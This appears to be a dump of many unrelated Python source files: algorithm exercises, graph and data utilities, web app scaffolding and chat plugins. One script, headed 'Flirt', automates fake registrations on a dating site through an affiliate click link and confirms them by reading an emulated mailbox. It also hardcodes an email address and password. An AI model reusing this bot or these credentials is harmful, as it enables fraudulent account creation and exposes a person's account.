text
stringlengths 8
6.05M
|
|---|
#!/usr/bin/env python
'''
## Course Project
##
'''
import graph_properties as gp
from pylab import *
import networkx as nx
# --------------------------------------------
# Base code
# --------------------------------------------
def get_unique_fn(path):
import time
timestr = time.strftime("%Y%m%d_%H%M%S")
filename = path + 'graph' + timestr
print filename
return filename
def print_graph(graph):
# header row
output = ', '.join(gp.get_all_property_names())
print(output)
for x in graph.nodes_iter():
output = str(x)
for y in gp.get_all_property_names():
output = output + "," + str(graph.node[x][y])
print(output)
def save_graph(graph, pathname):
fn = get_unique_fn(pathname)
nx.write_gml(graph, fn + '.gml')
def save_graphml(g, fname):
fn = get_unique_fn(fname)
nx.write_graphml(g, fn + '.graphml')
def save_csv(d, fname):
fn = get_unique_fn(fname)
output = ', '.join(gp.get_all_property_names())
print(output)
with open(fname, w):
for x in graph.nodes_iter():
output = str(x)
for y in gp.get_all_property_names():
output = output + "," + str(graph.node[x][y])
print(output)
fn.write(output)
def read_gml(fname):
print "reading ", fname
return nx.read_graphml(fname)
def read_csv(fname):
return nx.read
|
class Event:
def __init__(self, name, required_experience):
self.name = name
self.required_experience = required_experience
def print(self):
print(self.name + " requires " + self.required_experience);
class InterdisciplinaryEvent:
def __init__(self, base_event):
self.name = "Interdisciplinary " + base_event.name
self.required_experience = base_event.required_experience + 2
class InternationalEvent:
def __init__(self, base_event):
self.name = "International " + base_event.name
self.required_experience = base_event.required_experience + 4
class Speaker:
def __init__(self, name, experience):
self.name = name
self.experience = experience
self.events = []
def speak(self, event):
if event.required_experience > self.experience:
print(self.name + " does not have enough experience to speak at " + event.name)
else:
print(self.name + " is speaking at the " + event.name)
self.experience += event.required_experience
self.events.append(event)
def print_status(self):
print(self.name + " spoke at" + str(len(self.events)) + " events: ")
for event in self.events:
print(" * " + event.name)
print("this speaker has " + str(self.experience) + " level of experience");
dina = Speaker('Dina', 1)
meetup = Event('Meetup', 2)
party = Event('Party', 1)
conference = Event("Conference", 5)
interdisciplinary_meetup = InterdisciplinaryEvent(meetup)
international_interdisciplinary_meetup = InternationalEvent(interdisciplinary_meetup)
international_conference = InternationalEvent(conference)
dina.speak(party)
dina.speak(meetup)
dina.speak(conference)
dina.speak(interdisciplinary_meetup)
dina.print_status()
|
from pathlib import Path
class Site:
def __init__(self,source,dest,parsers = None):
self.source = Path(source)
self.dest = Path(dest)
self.parsers = parsers or []
def create_dir(self, path):
directory = self.dest / path.relative_to(self.source)
directory.mkdir(parents = True, exist_ok = True)
def load_parser(self,extension):
for parser in self.parsers:
if valid_extension(parser):
return parser
def run_parser(self,path):
parser = load_parser(path.suffix)
if(parser!= None):
parse(path,self.source,self.dest)
else:
print("Not Implemented!!")
def build(self):
self.dest.mkdir(parents = True, exist_ok=True)
for path in self.source.rglob("*"):
if path.is_dir():
self.create_dir(path)
elif path.is_file():
self.run_parser(path)
|
class Solution(object):
def search_insert(self, nums, target):
"""
Naive solution 40 ms
:type nums: List[int]
:type target: int
:rtype: int
"""
for i, num in enumerate(nums):
if num == target:
return i
# if target not in array
if num > target:
return i
else:
continue
return len(nums)
def search_insertion_v2(self, nums, target):
"""
my solution 36ms:
"""
if not nums or nums[0] == target:
return 0
left = 0
right = len(nums)-1
# at the beginning
if target < nums[left]:
return left
# or at the end of the list
if target > nums[right]:
return right + 1
# then we know the target should be inserted somewhere in the middle
while left < right:
middle = (left + right) // 2
if target == nums[middle]:
return middle
if target > nums[middle]:
left = middle + 1
if target <= nums[left]:
return left
# elif target < nums[middle]:
else:
right = middle - 1
if target == nums[right]:
return right
elif target > nums[right]:
return right + 1
def search_insertion_v3(self, nums, target):
"""
Binary search: 24ms solution from leetcode
NOTE:You can assume there is no duplicates
"""
if not nums:
return 0
left = 0
right = len(nums) - 1
while left <= right:
mid = (left + right) // 2
if target == nums[mid]:
return mid
if target < nums[mid]:
right = mid - 1
else:
left = mid + 1
print(f"mid: {mid}, left: {left}, right: {right}")
return left
nums = [1, 3, 5, 7]
target = 8
obj = Solution()
result = obj.search_insertion_v3(nums, target)
print(f"result: {result}, target: {target}")
|
from office365.runtime.queries.delete_entity_query import DeleteEntityQuery
from office365.runtime.queries.service_operation_query import ServiceOperationQuery
from office365.runtime.resource_path import ResourcePath
from office365.runtime.resource_path_service_operation import ResourcePathServiceOperation
from office365.sharepoint.base_entity import BaseEntity
from office365.sharepoint.principal.user import User
class RecycleBinItem(BaseEntity):
def delete_object(self):
"""Permanently deletes the Recycle Bin item."""
qry = DeleteEntityQuery(self)
self.context.add_query(qry)
self.remove_from_parent_collection()
return self
def restore(self):
"""Restores the Recycle Bin item to its original location."""
qry = ServiceOperationQuery(self, "Restore")
self.context.add_query(qry)
return self
def move_to_second_stage(self):
qry = ServiceOperationQuery(self, "MoveToSecondStage")
self.context.add_query(qry)
return self
@property
def id(self):
"""Gets a value that specifies the identifier of the Recycle Bin item."""
return self.properties.get('Id', None)
@property
def deleted_by(self):
"""Gets a value that specifies the user who deleted the Recycle Bin item."""
return self.properties.get('DeletedBy', User(self.context, ResourcePath("DeletedBy", self.resource_path)))
@property
def deleted_date(self):
"""Gets a value that specifies when the Recycle Bin item was moved to the Recycle Bin."""
return self.properties.get('DeletedDate', None)
def set_property(self, name, value, persist_changes=True):
super(RecycleBinItem, self).set_property(name, value, persist_changes)
# fallback: create a new resource path
if self._resource_path is None:
if name == "Id" and self._parent_collection is not None:
self._resource_path = ResourcePathServiceOperation(
"GetById", [value], self._parent_collection.resource_path)
|
import imgpr as ip
image = ip.image.openImage("example.png")
x = ip.placeholder(shape=image.shape[:2])
y = ip.layers.warping(x, (400, 400), ip.warp.sphere, fix_color=(200, 200, 200))
with ip.Session() as sess:
output = sess.run(y, feed_dict={x : image})
ip.image.showImages([[image, output]])
|
from sys import argv
# read the WYSS section for hoe to run this
script, first, second, third = argv
print("the script is called:", script)
print("your first variable is:", first)
print("the second variable is:", second)
print("the third variable is:", third)
first = input("please give first variable:")
second = input("please give second variable:")
third = input("please give third variable:")
|
# 국토교통부 아파트매매 실거래 데이터 수집
# - 지역코드
# - 법정동
# - 거래일
# - 아파트명
# - 지번
# - 전용면적
# - 층
# - 건축년도
# - 거래금액
import PublicDataReader as pdr
# Open API 서비스 키 설정
serviceKey = "OPEN API SERVICE KEY HERE"
# 국토교통부 실거래가 Open API 인스턴스 생성
molit = pdr.Transaction(serviceKey)
# 지역코드 조회
bdongName = '분당구'
codeResult = molit.CodeFinder(bdongName)
codeResult.head(1)
# 특정 월 아파트매매 실거래 자료 조회
df = molit.AptTrade(41135, 202004)
# 특정 기간 아파트매매 실거래 자료 조회
df_sum = molit.DataCollector(molit.AptTrade, 41135, 202001, 202003)
|
s, c, x = 0, 1, 1
while c <= 39:
s += c/x
c += 2
x *= 2
print('{:.2f}'.format(s))
|
from django.shortcuts import render
def main(request):
return render(request,"main.html")
def analyze(request):
return render(request, "analyze.html", {"output":request.FILES})
|
"""
using MSIS Fortran executable from Python
"""
from __future__ import annotations
from pathlib import Path
import subprocess
import logging
import typing as T
import shutil
import numpy as np
import h5py
import xarray
from . import cmake
def msis_setup(p: dict[str, T.Any], xg: dict[str, T.Any]) -> xarray.Dataset:
"""
calls MSIS Fortran executable msis_setup--builds if not present
[f107a, f107, ap] = activ
"""
name = "msis_setup"
src_dir = cmake.get_gemini_root()
for n in {"build", "build/Debug", "build/Release"}:
msis_exe = shutil.which(name, path=str(src_dir / n))
if msis_exe:
break
if not msis_exe:
raise EnvironmentError(
"Did not find gemini3d/build/msis_setup--build by:\n"
"gemini3d.cmake.build_gemini3d('msis_setup')\n"
)
alt_km = xg["alt"] / 1e3
# % CONVERT DATES/TIMES/INDICES INTO MSIS-FRIENDLY FORMAT
t0 = p["time"][0]
doy = int(t0.strftime("%j"))
UTsec0 = t0.hour * 3600 + t0.minute * 60 + t0.second + t0.microsecond / 1e6
# censor BELOW-ZERO ALTITUDES SO THAT THEY DON'T GIVE INF
alt_km[alt_km <= 0] = 1
# %% CREATE INPUT FILE FOR FORTRAN PROGRAM
msis_infile = p.get("msis_infile", p["indat_size"].parent / "msis_setup_in.h5")
msis_outfile = p.get("msis_outfile", p["indat_size"].parent / "msis_setup_out.h5")
with h5py.File(msis_infile, "w") as f:
f.create_dataset("/doy", dtype=np.int32, data=doy)
f.create_dataset("/UTsec", dtype=np.float32, data=UTsec0)
f.create_dataset("/f107a", dtype=np.float32, data=p["f107a"])
f.create_dataset("/f107", dtype=np.float32, data=p["f107"])
f.create_dataset("/Ap", shape=(7,), dtype=np.float32, data=[p["Ap"]] * 7)
# astype(float32) to save disk I/O time/space
# we must give full shape to give proper rank/shape to Fortran/h5fortran
f.create_dataset("/glat", shape=xg["lx"], dtype=np.float32, data=xg["glat"])
f.create_dataset("/glon", shape=xg["lx"], dtype=np.float32, data=xg["glon"])
f.create_dataset("/alt", shape=xg["lx"], dtype=np.float32, data=alt_km)
# %% run MSIS
args = [str(msis_infile), str(msis_outfile)]
if "msis_version" in p:
args.append(str(p["msis_version"]))
cmd = [msis_exe] + args
logging.info(" ".join(cmd))
ret = subprocess.run(cmd, text=True, cwd=Path(msis_exe).parent)
if ret.returncode == 20:
raise RuntimeError("Need to compile with 'cmake -Dmsis20=true'")
if ret.returncode != 0:
raise RuntimeError(
f"MSIS failed to run: return code {ret.returncode}. See console for additional error info."
)
# %% load MSIS output
# use disk coordinates for tracability
with h5py.File(msis_outfile, "r") as f:
alt1 = f["/alt"][:, 0, 0]
glat1 = f["/glat"][0, :, 0]
glon1 = f["/glon"][0, 0, :]
atmos = xarray.Dataset(coords={"alt_km": alt1, "glat": glat1, "glon": glon1})
for k in {"nO", "nN2", "nO2", "Tn", "nN", "nH"}:
atmos[k] = (("alt_km", "glat", "glon"), f[f"/{k}"][:])
# Mitra, 1968
atmos["nNO"] = 0.4 * np.exp(-3700.0 / atmos["Tn"]) * atmos["nO2"] + 5e-7 * atmos["nO"]
return atmos
|
import numpy as np
import gain
import math
import matplotlib.pyplot as plt
def UCB(T, J, nb_machines) :
s = [0] * nb_machines #nombre de fois où le bras k a été joué
regret = [0]
moy = [0] * nb_machines
B = [0] * nb_machines
a = 0 # On suppose que le gain théorique de la machine ne sera jamais très supérieur 0
# Détermination de b, plus petit k tel que P(X = k) < 10^-9
#==============================================================================
# mu = 1.5
# b = 0
# p = math.exp(-mu) * mu**b / math.factorial(b)
# while p > 1e-10 :
# b += 1
# p = math.exp(-mu) * mu**b / math.factorial(b)
#==============================================================================
b = 15
for i in range(nb_machines) :
moy[i] = gain.testGain(i+1, J)[0]
s[i] += 1
regret.append(regret[-1] + (-gain.testGain(i+1, J)[1] + gain.testGain(3, J)[1])/T)
# print(moy)
for t in range(nb_machines, T+1) :
for k in range(nb_machines) :
B[k] = moy[k] + (b - a) * math.sqrt(3 * np.log(1/0.95) / (2 * s[k]))
k = np.argmax(np.asarray(B))
print(B)
moy[k] = gain.testGain(k+1, J)[0]/(s[k] + 1) + (s[k]) / (s[k] + 1) * moy[k]
s[k] += 1
regret.append(regret[-1] + (-gain.testGain(k+1, J)[1] + gain.testGain(3, J)[1])/T)
print(moy)
return np.asarray(regret[1:-1])
plt.plot(UCB(1000, 0, 5), "green")
|
'''
Flirt
'''
from selenium import webdriver
from time import sleep
# import xlrd
import random
import os
import time
import sys
sys.path.append("..")
# import email_imap as imap
# import json
import re
# from urllib import request, parse
from selenium.webdriver.support.ui import Select
# import base64
import Chrome_driver
import email_imap as imap
import name_get
import db
import selenium_funcs
import Submit_handle
import random
import emaillink
def web_submit(submit,chrome_driver,debug=0):
# test
# Excel_10054 = 'Data2000'
# Excel_10054 = 'Uspd'
if debug == 1:
site = 'http://zh.moneymethods.net/click.php?c=11&key=75uwb87m43ef55qo3ytehrd1'
submit['Site'] = site
chrome_driver.get(submit['Site'])
chrome_driver.maximize_window()
chrome_driver.refresh()
sleep(5)
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[1]/div/div/div/div[1]/label').click()
sleep(2)
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[2]/div/div[2]/button[1]').click()
sleep(2)
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[3]/div/div[1]/div/div[1]/label').click()
sleep(2)
num_eye = random.randint(0,3)
if num_eye == 0:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[4]/div/div[1]/button[1]').click()
elif num_eye == 1:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[4]/div/div[1]/button[2]').click()
elif num_eye == 2:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[4]/div/div[1]/button[3]').click()
else:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[4]/div/div[1]/button[4]').click()
sleep(2)
num_hare = random.randint(0,3)
if num_hare == 0:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[5]/div/div[1]/button[1]').click()
elif num_hare == 1:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[5]/div/div[1]/button[2]').click()
elif num_hare == 2:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[5]/div/div[1]/button[3]').click()
else:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[5]/div/div[1]/button[4]').click()
sleep(2)
index = random.randint(0,4)
s1 = Select(chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[6]/div/div[1]/div/select'))
s1.select_by_index(index)
sleep(2)
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[6]/div/div[2]/button[1]').click()
sleep(2)
num_noob = random.randint(0,3)
if num_noob == 0:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[7]/div/div[1]/button[1]').click()
elif num_noob == 1:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[7]/div/div[1]/button[2]').click()
elif num_noob == 2:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[7]/div/div[1]/button[3]').click()
else:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[7]/div/div[1]/button[4]').click()
sleep(2)
num_ass = random.randint(0,3)
if num_ass == 0:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[8]/div/div[1]/button[1]').click()
elif num_ass == 1:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[8]/div/div[1]/button[2]').click()
elif num_ass == 2:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[8]/div/div[1]/button[3]').click()
else:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[8]/div/div[1]/button[4]').click()
sleep(10)
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[10]/div/div/button').click()
sleep(5)
name = name_get.gen_one_word_digit(lowercase=False)
pwd = Submit_handle.password_get()
try:
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[11]/div/div[2]/button').click()
sleep(2)
chrome_driver.find_element_by_xpath('//*[@id="username"]').send_keys(name)
sleep(1)
chrome_driver.find_element_by_xpath('//*[@id="password"]').send_keys(pwd)
sleep(1)
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[12]/div/div[4]/button[1]').click()
sleep(2)
chrome_driver.find_element_by_xpath('//*[@id="email"]').send_keys(submit['Email']['Email_emu'])
sleep(1)
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[13]/div/div[2]/button[1]').click()
sleep(10)
except:
if chrome_driver.find_element_by_xpath('//*[@id="username"]'):
print('==============')
print('==============')
chrome_driver.find_element_by_xpath('//*[@id="username"]').send_keys(name)
sleep(1)
chrome_driver.find_element_by_xpath('//*[@id="password"]').send_keys(pwd)
sleep(2)
chrome_driver.find_element_by_xpath('//*[@id="email"]').send_keys(submit['Email']['Email_emu'])
sleep(1)
chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[11]/div/div[6]/button').click()
sleep(10)
sleep(20)
site = ''
handle = chrome_driver.current_window_handle
try:
site = email_confirm(submit)
print(site)
except Exception as e:
print('email check failed',str(e))
if site != '':
newwindow='window.open("' + site + '");'
chrome_driver.execute_script(newwindow)
sleep(30)
else:
chrome_driver.close()
chrome_driver.quit()
return
handles=chrome_driver.window_handles
sleep(10)
try:
for i in handles:
if i != handle:
chrome_driver.switch_to.window(i)
try:
chrome_driver.refresh()
sleep(20)
try:
chrome_driver.find_element_by_xpath('//*[@id="mainContainer"]/div/section/ul[1]/li[3]/div/a').click()
except:
pass
except:
pass
except:
pass
return 1
def email_confirm(submit):
print('----------')
for i in range(5):
url_link = ''
try:
name = submit['Email']['Email_emu']
pwd = submit['Email']['Email_emu_pwd']
title = ('service@ga.mydates.com','')
# 'https://mydates.com?code=0df6c9c9-12ba-46a6-8282-7b6a4c9f2103&trk=5fzb3wd'
pattern = r'.*?(https://mydates.com\?code=[0-9a-zA-Z]{1,10}-[0-9a-zA-Z]{1,10}-[0-9a-zA-Z]{1,10}-[0-9a-zA-Z]{1,10}-[0-9a-zA-Z]{1,20}&trk=[0-9a-zA-Z]{1,10})'
# url_link = emaillink.get_email(name,pwd,title,pattern)
# if 'http' in url_link :
# print(url_link)
# break
# title = ('supportlivecam.com','')
# pattern = r'.*?Confirm Your Email.*?(http://trk.email.supportlivecam.com/[0-9a-zA-Z]{1,30}/[0-9a-zA-Z]{1,1000})By clicking on the'
url_link = emaillink.get_email(name,pwd,title,pattern,True)
if 'http' in url_link :
url_link = url_link.replace('?','/?').replace('&','&')
print(url_link)
break
except Exception as e:
print(str(e))
print('===')
pass
return url_link
def web_confirm():
url='https://mydates.com/?code=685bae42-d07c-400e-9eef-91b1627f94c1&trk=5g2959w'
chrome_driver = Chrome_driver.get_chrome()
chrome_driver.get(url)
try:
chrome_driver.find_element_by_xpath('//*[@id="mainContainer"]/div/section/ul[1]/li[3]/div/a').click()
except:
pass
sleep(300)
def test():
# db.email_test()
Mission_list = ['10009']
Excel_name = ['','Email']
Email_list = ['hotmail.com','outlook.com','yahoo.com','aol.com','gmail.com']
submit = db.read_one_excel(Mission_list,Excel_name,Email_list)
# db.read_all_info()
# print(submit)
# excel_list = []
# for i in range(400):
# submit = db.read_one_excel(Mission_list,Excel_name,Email_list)
# # print(submit)
# excel_list.append(submit['Email']['Email_Id'])
# # print(excel_list)
# print(len(excel_list))
# print(len(set(excel_list)))
# date_of_birth = Submit_handle.get_auto_birthday(submit['Uspd']['date_of_birth'])
# print(date_of_birth)
web_submit(submit,1)
# print(submit['Uspd'])
# print(submit['Uspd']['state'])
# print(submit['Uspd']['city'])
# print(submit['Uspd']['zip'])
# print(submit['Uspd']['date_of_birth'])
# print(submit['Uspd']['ssn'])
def email_test():
submit = {'Email':{'Email_Id': '6f4ff393-aa34-11e9-a4ec-0003b7e49bfc', 'Email_emu': 'SummerCopelandk@aol.com', 'Email_emu_pwd': 'reo3xzpL', 'Email_assist': '', 'Email_assist_pwd': '', 'Status': 'Good'}}
email_confirm(submit)
if __name__=='__main__':
web_confirm()
print('......')
|
from django.conf.urls import patterns, include, url
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
import emart.views
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'emart.views.home', name='home'),
# url(r'^emart/', include('emart.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
url(r'^$',emart.views.home),
url(r'^home/$',emart.views.home),
url(r'^login/$',emart.views.login),
url(r'^signup/$',emart.views.signup),
url(r'^handle_login/$',emart.views.handle_login),
url(r'^detail/id/(\d{8})/$',emart.views.detail),
url(r'^delete_item/id/(\d{8})/$',emart.views.delete_item),
url(r'^view_commodities_by_class/(\w+)/$',emart.views.view_commodities_by_class),
url(r'^add_to_chart/$',emart.views.add_to_chart),
url(r'^my_chart/$',emart.views.my_chart),
url(r'^generate_order/$',emart.views.generate_order),
url(r'buy_now/(\d{8})/',emart.views.buy_now),
url(r'^logout/$',emart.views.logout),
url(r'^my_orders/$',emart.views.my_orders),
url( r'^static/(?P<path>.*)$', 'django.views.static.serve',{ 'document_root': '/home/sign/E-Mart/emart' }),
)
|
alphabet="abcdefghijklmnopqrstuvwxyz"
def removechar(string,idx):
return string[:idx]+string[idx+1:]
def removedupli(mystring):
newstr=""
for ch in mystring:
if ch not in newstr:
newstr=newstr+ch
return newstr
def removeMatches(mystring,removestring):
newstr=""
for ch in mystring:
if ch not in removestring:
newstr=newstr+ch
return newstr
def genekeypass(password):
key='abcdefghijklmnopqrstuvwxyz'
password=removedupli(password)
lastchar=password[-1]
lastidx=key.find(lastchar)
afterstring = removeMatches(key[lastidx+1:],password)
beforestring= removeMatches(key[:lastidx],password)
key=password+afterstring+beforestring
return key
def subsencrypt(plaintext,key1):
plaintext=plaintext.lower()
ciphertext=""
for ch in plaintext:
idx=alphabet.find(ch)
ciphertext=ciphertext+key1[idx]
return ciphertext
def neighbourcount(text):
nbdict={}
text=text.lower()
for i in range(len(text)-1):
nblist=nbdict.setdefault(text[i],{})
maybeAdd(text[i+1],nblist)
nblist=nbdict.setdefault(text[i+1],{})
maybeAdd(text[i],nblist)
return nbdict
def maybeAdd(ch,todict):
if ch in alphabet :
todict[ch]=todict.setdefault(ch,0)+1
x=raw_input("what's your password>>>")
genkey=genekeypass(x)
book=open('alpha.txt')
mytext=book.read()
y=subsencrypt(mytext,genkey)
ncount=neighbourcount(y)
print ncount
|
"""
Copyright MIT and Harvey Mudd College
MIT License
Summer 2020
Lab 5 - AR Markers
"""
########################################################################################
# Imports
########################################################################################
import sys
import cv2 as cv
import numpy as np
sys.path.insert(0, "../../library")
import racecar_core
import racecar_utils as rc_utils
########################################################################################
# Global variables
########################################################################################
rc = racecar_core.create_racecar()
# Add any global variables here
########################################################################################
# Functions
########################################################################################
def start():
"""
This function is run once every time the start button is pressed
"""
# Have the car begin at a stop
rc.drive.stop()
# Print start message
print(">> Lab 5 - AR Markers")
def update():
"""
After start() is run, this function is run every frame until the back button
is pressed
"""
color_image = rc.camera.get_color_image()
markers = rc_utils.get_ar_markers(color_image)
# TODO: Turn left if we see a marker with ID 0 and right for ID 1
# TODO: If we see a marker with ID 199, turn left if the marker faces left and right
# if the marker faces right
# TODO: If we see a marker with ID 2, follow the color line which matches the color
# border surrounding the marker (either blue or red). If neither color is found but
# we see a green line, follow that instead.
########################################################################################
# DO NOT MODIFY: Register start and update and begin execution
########################################################################################
if __name__ == "__main__":
rc.set_start_update(start, update, None)
rc.go()
|
import boto3
import json
import cv2
# Document
documentName = "7_screen.png"
# Read document content
with open(documentName, 'rb') as document:
imageBytes = bytearray(document.read())
img = cv2.imread('messi5.jpg',
|
from flask import Flask
from rest.controllers.estudante import app as estudante_controller
from rest.controllers.disciplina import app as disciplina_controller
from rest.controllers.usuario import app as usuario_controller
from rest.models.model import db
app = Flask(__name__, template_folder='templates')
#SQLite é um pacote que disponibiliza um Sistema Gerenciador de Banco de Dados Relacional e
# permite ser executado através de linha de comando, possibilitando executar qualquer
# query SQL básica de maneira simples. (Nossa aplicação não dependerá desse pacote para ser executada,
# mas seria bom já instalá-lo caso surja a necessidade de executar alguma query SQL no banco)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.register_blueprint(estudante_controller, url_prefix="/estudante/")
app.register_blueprint(disciplina_controller, url_prefix="/disciplina/")
app.register_blueprint(usuario_controller, url_prefix="/usuario/")
#Blueprint basicamente permite que um módulo estenda a aplicação principal e
# funcione similarmente a aplicação Flask. Sendo esta uma das grandes vantagem para aplicações maiores,
# por permitir a modularização de uma aplicação, o que facilita em muito a organização,
# desenvolvimento e manutenções do código fonte.
@app.route("/")
def index():
return "Index"
if __name__ == '__main__':
db.init_app(app=app)
with app.test_request_context():
db.create_all()
app.run()
|
import hexchat
import pushbullet
__module_name__ = "pushbullet"
__module_version__ = "1.0"
__module_description__ = "Send messages via Pushbullet"
CONFIG_APIKEY = 'pushbullet_api_key'
def pushb(word, word_eol, userdata):
""" Hook for /pushb command in HexChat"""
api_key = hexchat.get_pluginpref(CONFIG_APIKEY)
if word[1] == 'CONFIG':
if len(word_eol) > 2:
set_config(word_eol[2])
else:
hexchat.prnt('Pushbullet API key currently set to "{}"'
.format(api_key))
return hexchat.EAT_HEXCHAT
if not api_key:
hexchat.prnt('\037\00304Pushbullet API key not specified.',
' Use /pushb CONFIG <api_key> to set one.')
return hexchat.EAT_HEXCHAT
try:
pb = pushbullet.Pushbullet(api_key)
except pushbullet.errors.InvalidKeyError:
hexchat.prnt('\037\00304Invalid API key!')
return hexchat.EAT_HEXCHAT
push(word, word_eol)
return hexchat.EAT_HEXCHAT
def push(word, word_eol):
""" "push" function """
title = "IRC Message from {}".format(hexchat.get_info('nick'))
text = word_eol[1]
if text.startswith('http'):
pb.push_link(title, text)
else:
pb.push_note(title, text)
hexchat.prnt('Pushed!')
def set_config(api_key):
""" Sets API key in plugin preferences. """
if hexchat.set_pluginpref(CONFIG_APIKEY, api_key):
hexchat.prnt('Pushbullet API key set.')
else:
hexchat.prnt('\037\00304Failed to configure Pushbullet plugin!')
hexchat.prnt('Pushbullet plugin loaded. Use /pushb to send a message.')
hexchat.hook_command('pushb', pushb)
|
"""
https://leetcode.com/problems/set-matrix-zeroes/
Medium
Given an m x n integer matrix matrix, if an element is 0, set its entire row and column to 0's, and return the matrix.
You must do it in place.
Input: matrix = [[1,1,1],[1,0,1],[1,1,1]]
Output: [[1,0,1],[0,0,0],[1,0,1]]
Input: matrix = [[0,1,2,0],[3,4,5,2],[1,3,1,5]]
Output: [[0,0,0,0],[0,4,5,0],[0,3,1,0]]
"""
from typing import List
class Solution:
def setZeroes(self, matrix: List[List[int]]) -> None:
"""
Do not return anything, modify matrix in-place instead.
"""
queue = []
for i in range(len(matrix)):
for j in range(len(matrix[i])):
if matrix[i][j] == 0:
queue.append((i, j))
def process(i, j):
for k in range(len(matrix[i])):
matrix[i][k] = 0
for k in range(len(matrix)):
# print (matrix[k][j])
matrix[k][j] = 0
for i in queue:
process(i[0], i[1])
print(matrix)
class Solution2(object):
def setZeroes(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: void Do not return anything, modify matrix in-place instead.
"""
R = len(matrix)
C = len(matrix[0])
rows, cols = set(), set()
for i in range(R):
for j in range(C):
if matrix[i][j] == 0:
rows.add(i)
cols.add(j)
for i in range(R):
for j in range(C):
if i in rows or j in cols:
matrix[i][j] = 0
matrix = [[0,1,2,0],[3,4,5,2],[1,3,1,5]]
print ("Input : {}".format(matrix))
ans = Solution().setZeroes(matrix)
print ("Solution : {}".format(ans))
matrix = [[1,1,1],[1,0,1],[1,1,1]]
print ("Input : {}".format(matrix))
ans = Solution().setZeroes(matrix)
print ("Solution : {}".format(ans))
|
import os, shutil, re
def str2time(text):
h, m, s = text.split(':')
return int(h) * 3600 + int(m) * 60 + float(s)
def get_error_log(lines):
error_log = []
prev_end_time = 0
prev_line = ''
for idx, line in enumerate(lines):
try:
# Validate Style
if line.startswith('Style') and \
('panton' not in line.lower() or 'arial' in line.lower()):
error_log.append(f"Line {idx+1}: incorrect style")
if line.startswith('Dialogue'):
start_time = str2time(line.split(',')[1])
# Validate Position
position = int(line.split(',')[7])
if 'start' in line.lower() and 'tiempo' in line.lower() and position != 550:
error_log.append(f"Line {idx+1}: position of 'Tiempo' != 550")
if position >= 600:
error_log.append(f"Line {idx+1}: position >= 600")
# Validate Time
if start_time - prev_end_time >= 10:
error_log.append(f"Line {idx+1}: there is a time gap >= 10s with the previous line")
# Validate Frames timing
if prev_end_time >= start_time and \
(('INSTRUMENTAL' in prev_line and 'tropicalzone' not in line) or
('tropicalzone' in prev_line)):
error_log.append(f"Line {idx+1}: 'INSTRUMENTAL' frame is finishing too late or the next line is starting too early")
if prev_end_time >= start_time and '.....' in prev_line and '.....' not in line:
error_log.append(f"Line {idx+1}: '.....' frame is finishing too late or the next line is starting too early")
# Validate {\kf0}
prev_end_time = str2time(line.split(',')[2])
prev_line = line
except:
error_log.append(f"Unknown error in Line {idx+1}: {line}")
if len(error_log) == 0:
error_log = ['OK']
return error_log
|
#!/usr/bin/python
from sklearn import preprocessing
from numpy import genfromtxt, savetxt
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn import preprocessing, svm
from sklearn.preprocessing import OneHotEncoder
from sklearn.externals import joblib
import random
import sys
def RandomForest(file):
train = pd.read_csv(file)
test = pd.read_csv("RF_testsample.csv")
cols = ['conservation','polaritychange','chargechange','hydroindexchange','secondarystruc','asa','sizechange']
colsRes = ['class']
trainArr = train.as_matrix(cols)
trainRes = train.as_matrix(colsRes)
trainRes = trainRes.ravel()
rf = RandomForestClassifier(max_features=0.3,n_estimators=100,n_jobs=1,min_samples_leaf=50)
rf.fit(trainArr,trainRes)
testArr = test.as_matrix(cols)
result = rf.predict(testArr)
test['predicted4'] = result
test.to_csv(sys.argv[2])
print(test)
RandomForest(sys.argv[1])
|
class Meta(object):
def __init__(self,name,base,subcls):
print(self,name,base,subcls)
Base=Meta('','','')
class Test(Base):
prop1='hello'
|
from paste.deploy import appconfig
from pylons import config
from gwhiz.config.environment import load_environment
conf = appconfig('config:' + '/home/kgraehl/gwhiz.com/development.ini')
load_environment(conf.global_conf, conf.local_conf)
from gwhiz.model import *
|
from collections import defaultdict
paragraph = """The rat sat in a tar pit today. I gave him a tip then. I wished on a star for no rats tonight."""
pretty_words = [single_word.lower() for single_word in set(paragraph.split())]
testdir = defaultdict(list)
word_comparison = defaultdict(list)
